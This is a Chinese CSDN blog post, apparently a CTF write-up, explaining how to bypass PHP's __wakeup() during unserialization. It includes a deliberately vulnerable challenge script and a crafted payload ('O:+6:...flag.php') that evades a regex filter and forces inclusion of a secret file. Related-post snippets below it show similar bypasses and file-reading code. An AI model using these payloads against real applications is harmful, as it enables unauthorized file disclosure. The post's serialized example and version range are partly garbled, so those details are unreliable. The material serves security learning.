反序列化__wakeup()绕过

已于 2024-03-08 20:56:02 修改
阅读量1.2k 收藏 13
点赞数 16
CC 4.0 BY-SA版权
分类专栏: 反序列化 文章标签: PHP魔术方法 web安全 wakeup魔术方法绕过
于 2024-01-24 09:21:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/csjjjd/article/details/135796959
本文详细解释了PHP中__wakeup魔术方法的漏洞,当序列化字符串中的属性个数超出实际时,会跳过该方法的执行。作者通过实例展示了如何利用此漏洞绕过安全限制,以及修复建议。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

据陈腾师傅所说:

漏洞产生原因:
如果存在——wakeup()方法,调用unserilze()方法前则线调用——wakeup()方法,但是序列化字符串中表示对象属性个数的值大于真实的属性个数时,会tiaoguo——wakeup()的执行。

也就是属性个数比你实际个数多。

但是限制很大,5<php<5.6&&<7php<7.0.1

举个例子:

o:4:"test":2:{s:2:"v1":s:6:"benben":s:2:"v2";s:3:"123";}

在这里如果test本来有wake()——魔术方法,但是我把2改成3,那就不会触发。

<?php
error_reporting(0);
class secret{
    var $file='index.php';

    public function __construct($file){
        $this->file=$file;
    }

    function __destruct(){
        include_once($this->file);
        echo $flag;
    }

    function __wakeup(){
        $this->file='index.php';
    }
}
$cmd=$_GET['cmd'];
if (!isset($cmd)){
    highlight_file(__FILE__);
}
else{
    if (preg_match('/[oc]:\d+:/i',$cmd)){
        echo "Are you daydreaming?";
    }
    else{
        unserialize($cmd);
    }
}
//sercet in flag.php
?>

这里因为flag在flag.php但是我只要进行反序列化就会触发wake()魔术方法,使file=index.php,这不是我们要的,所以必须绕过它,这里直接复制前面代码,把file改为flag.php,进行反序列化,得到正常的pop链,之后再把   后面的数字加个正号,然后把属性加一,接下来URL编码就可以绕过。

代码:

<?php
class secret
{
    var $file = 'flag.php';
}
echo serialize(new secret());
$a='O:+6:"secret":2:{s:4:"file";s:8:"flag.php";}';
echo urlencode($a);

如下图:

一句话:绕过__wakeup()就三步走:

(1)拿到正常反序列化字符串

(2)在pop链O:+6:"secret":2:{s:4:"file";s:8:"flag.php";}加入正号

(3)URL编码提交

当然了,在最后还得做一个小总结:__wakeup()函数漏洞原理:当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。

希望文章对大家能够有帮助!

__wakeup绕过版本_PHP__wakeup()方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
08-29 1315
​ __wakeup函数是在php在使用反序列化函数unserialize()时,会自动调用的函数。只要序列化的中的成员数大于实际成员数,即可绕过
21-3 PHP反序列化漏洞-魔术方法绕过
weixin_43263566的博客
01-17 870
启动靶场 -> 在浏览器打开链接(这个靶场平台比较良心不用花钱,有些平台按分钟收钱,时间一到靶场不续费就自动关闭)先进行进行收集,根据页面提示网站备份,我们可以通过目录探测方式找到备份文件,并根据文件进行审计等后续操作,以达到读取flag文件的目的。在PHP中,__wakeup()是一个魔术方法,用于在反序列化对象时自动调用。来进行绕过,通过添加位置来改变类名的个数。或 搜索: “[极客大挑战 2019]PHP”:指定排除的HTTP状态码,以逗号分隔。
渗透测试-PHP反序列化绕过
cdyunaq的博客
04-26 4653
最简单的反序列化 require_once('flag.php'); highlight_file(__FILE__); classA{ private$user='test'; function__destruct(){ ...
反序列化中_wakeup绕过
rev1ve的博客
09-05 3150
反序列化中_wakeup扮演着非常重要的角色,ctf碰到很多的题目都有涉及到_wakeup绕过,写下这篇博客来总结下大部分绕过方法,其中会有例题具体演示。
反序列化Wakeup方法绕过
最新发布
lubai60060的博客
05-25 737
这里__wakeup()的绕过方法还是很简单的,一般情况下不会单独出现。
__wakeup()绕过
v2ish1yan的博客
04-23 6797
__wakeup函数是在php在使用反序列化函数unserialize()时,会自动调用的函数 如xctf-unserialize3 只要序列化的中的成员数大于实际成员数,即可绕过 如 <?php class xctf { public $flag = '111'; public function __wakeup() { exit('bad requests'); } } $a=new xctf(); var_dump(seri
php序列化绕过wakeup,PHP反序列化漏洞#XCTF题 : unserialize3#绕过wakeup()函数
weixin_42544461的博客
03-22 562
1.代码与结果代码如下:class xctf{public $flag='111';public function __wakeup(){exit('bad requests');}}$content = new xctf();echo serialize($content);?>结果如下:O:4:"xctf":1:{s:4:"flag";s:3:"111";}实验截图:2.相关姿势点2.1...
绕过__wakeup() 反序列化 合集
Jay17的博客
08-24 1994
绕过__wakeup() 反序列化 合集
Newstar week5 WEB Unserialize Again(phar反序列化,__wakeup()绕过,phar重签名)
2301_76690905的博客
11-10 608
newf = s + sha1(s).digest() + h # 对要签名的数据进行SHA-1哈希计算,并将原始数据、签名和类型/标识拼接成新的数据newf。//写文件,文件名是$pear,内容是$file。f = file.read() #打开名为1.phar的文件,以二进制只读模式读取文件内容,并将其存储到变量f中。在文件系统函数(file_exists()、is_dir()等)参数可控的情况下,配合phar://伪协议,可以。因为重新赋值修改了文件的内容,之前的签名就会无效,所以需要。
攻防世界_Web_php_unserialize(绕过php反序列/绕过wakeup函数/代码审计)
2401_87524087的博客
02-01 1424
preg_match() 函数用来匹配一个正则表达,匹配上了就返回true,上面代码正则匹配的是不区分大小写的o:数字或者是c:数字,用来干扰反序列化的unserialize() 函数用来反序列化字符串,将字符串反序列化PHP代码。
[HNCTF 2022 WEEK2]easy_unser - 反序列化(wakeup绕过&目录绕过)
oZuoShen123的博客
10-07 1253
2、起始:body(__construct)、终点:body(__destruct),中间需要绕过__wakeup()1、题目干扰字符太多了,其实简化之后的代码差不多这样。
PHP反序列化--_wakeup()绕过
2302_79800344的博客
03-18 762
【代码】PHP反序列化--_wakeup()绕过
ctf-php反序列化绕过__wakeup
qq_32445755的博客
05-19 2307
注意:PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法。所以在定义类方法时,除了上述魔术方法,建议不要以 __ 为前缀。 __wakeup()是用在反序列化操作中。unserialize()会检查存在一个__wakeup()方法。如果存在,则先会调用__wakeup()方法。 部分代码 class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 此时需要绕过__
PHP反序列化中如何绕过_wakeup()函数的一些技巧
m0_63138919的博客
08-28 1710
本文为魔术方法_wakeup()的一些绕过用法
CTF必看~ PHP反序列化漏洞6:绝妙_wakeup绕过技巧
Eason_LYC安全白帽子的成长博客
05-22 4998
_wakeup()PHP 中一个特殊的魔术方法。它在反序列化一个对象时被自动调用,允许开发者在对象从序列化格式还原为可用的 PHP 对象之前对其进行某些特殊处理。这个方法可以接受任意的参数,但在实际使用中,它通常不需要参数。
攻防世界-unserialize3_魔术函数,以及wakeup()函数的绕过
Fisher
05-15 1467
拿到题目得到一段代码: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 根据提提示是序列化,将xctf类进行序列化,之后如果执行__wakeup()则会跳出, 所以需要构造函数绕过 __wakeup() 经常用在反序列化操作中,例如重新建立数据库连接,或执行其它初始化操作 所以是将序列化的值反序列化之后执行,因此我们构造序列化的值 先将类进行序列化: <?php
绕过__wakeup,先执行外面的类&天翼杯的eval那个题的一个思考
Je3Z的博客
09-25 464
<?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; } } class B{ function __destruct(){ .
[极客大挑战 2019]PHP (简单的php反序列化和__wakeup绕过
xlcvv的博客
04-05 980
这群师傅,不仅懂得D站,html也写的很棒,超喜欢这里的,人长的又帅,说话又好听······ 进入正题,提示备份了网站,那就是WWW.zip了,下载下来: 浏览了一遍,主要在class.php里面: <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; ...
PHP反序列化2(OC绕过.wakeup绕过
2302_81328699的博客
09-26 781
PHP反序列化2(OC绕过.wakeup绕过
ctf反序列化wakeup绕过
02-03
### CTF 中反序列化漏洞与 `__wakeup` 函数绕过技巧 #### 反序列化漏洞简介 在网络安全领域,CTF(Capture The Flag)比赛中经常涉及反序列化漏洞的利用。这类漏洞源于应用程序信任并处理未经验证的数据流,在对象被重新创建的过程中可能引发恶意行为[^1]。 #### PHP中的反序列化机制 对于PHP而言,当程序接收到表示先前保存状态的对象字符串时会触发反序列化进程。如果攻击者能够控制这个输入,则可以精心构造数据来操纵目标应用内部逻辑甚至执行任意代码[^2]。 #### 利用`__wakeup()`实现绕过的原理 特别地,在某些情况下,开发者可能会定义特殊的方法如`__sleep()`和`__wakeup()`用于自定义序列化/反序列化的流程。后者会在每次成功恢复之前自动调用;因此成为了一个潜在的安全风险点——只要能影响到它的入参就有可能达成预期之外的效果[^3]。 具体来说,假设存在如下场景: - 应用中有某个类实现了上述提到的一个或多个魔术方法; - 攻击面允许提交经过编码后的payload作为待解析的内容; - 关键在于找到一条从外部可控入口直达敏感操作之间的路径,并且其间没有任何有效的防护措施阻止这种交互的发生。 此时就可以考虑构建特定结构体使得一旦完成加载就会立即激活预设好的指令链条,进而达到诸如泄露服务器端文件内容的目的[^5]。 ```php <?php class File { public $filename; public $filetype; function __construct($name, $type){ $this->filename=$name; $this->filetype=$type; } function __wakeup(){ if ($this->filetype === 'image/jpeg'){ echo "Normal operation"; }else{ // 这里可能存在危险的操作,比如读取其他文件 var_dump(readfile("php://filter/read=convert.base64-encode/resource={$this->filename}")); } } } ?> ``` 此段代码展示了如何通过设置不同的$filetype属性值来决定是否执行不安全的行为。实际环境中应当避免让此类条件判断依赖于用户提供的信息以防滥用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值